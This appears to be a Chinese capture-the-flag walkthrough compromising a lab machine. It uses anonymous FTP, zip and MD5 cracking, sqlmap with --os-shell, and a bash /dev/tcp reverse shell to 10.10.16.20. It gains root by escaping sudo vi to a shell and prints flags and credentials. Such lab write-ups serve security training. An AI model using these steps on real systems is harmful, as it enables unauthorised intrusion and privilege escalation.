尝试注入。。失败

发现网页没啥有用的
看看21端口开放的ftp

连接成功，账号Anonymous，密码为空

发现文件：backup.zip

使用kali自带的zip2john 爆破密码
得到密码：741852963 (backup.zip)

unzip 文件名 解压
用密码解压后，得到两个文件(index.php、Style.css)

在index.php里发现这样一行代码
“session_start();
if(isset($_POST['username']) && isset($_POST['password'])) {
if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
$_SESSION['login'] = "true";
header("Location: dashboard.php");
}
}
?>

用MD5加密的值是 qwerty789
同时发现网站的登录地址是 ：dashboard.php

发现此处报错，证明有sql注入

尝试sqlmap注入：
sqlmap -u http://10.129.147.44/dashboard.php?search=1 —cookie PHPSESSID=5a28uftk57hrg3vrunr3cis8cs —batch —os-shell

获得的shell是非交互式，要在此利用反弹shell，以获得交互式shell
bash -c “bash -i >& /dev/tcp/10.10.16.20/12123 0>&1”

监听端口12123
拿到shell

postgres@vaccine:/var/lib/postgresql$ls<br />ls<br />11<br />user.txt<br />postgres@vaccine:/var/lib/postgresql$ cat user.txt
cat user.txt
ec9b13ca4d6229cd5cc1e09980965bf7

在www目录发现dashboard.php里看到这样信息
try {
$conn = pg_connect(“host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!”);
}

有了密码，尝试ssh连接
ssh postgres@10.129.147.44

这里再次发现user.txt

postgres@vaccine:~$ls<br />11 user.txt<br />~~postgres@vaccine:~$ cat user.txt~~
ec9b13ca4d6229cd5cc1e09980965bf7

这里是使用vi编辑器提权，vi里可以直接输入命令，因为这个vi是sudo打开，调出的shell也就是root身份。

命令：sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
密码：P@s5w0rd!

在vi编辑界面里，输入:!/bin/bash

提权成功

=================================================================

后续内容不公开
原因-含有flag

在根目录发现root.txt
root@vaccine:# ls
pg_hba.conf root.txt snap
root@vaccine:# cat root
cat: root: No such file or directory
root@vaccine:~# cat root.txt
dd6e058e814260bc70e9bbdef2715849
至此拿到flag